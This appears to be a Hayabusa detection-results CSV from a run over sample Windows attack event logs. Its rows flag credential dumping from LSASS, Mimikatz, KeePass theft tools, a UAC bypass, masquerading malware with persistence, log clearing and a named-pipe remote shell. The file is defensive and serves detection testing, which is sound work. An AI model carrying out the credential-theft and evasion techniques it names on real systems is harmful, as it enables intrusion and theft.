2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
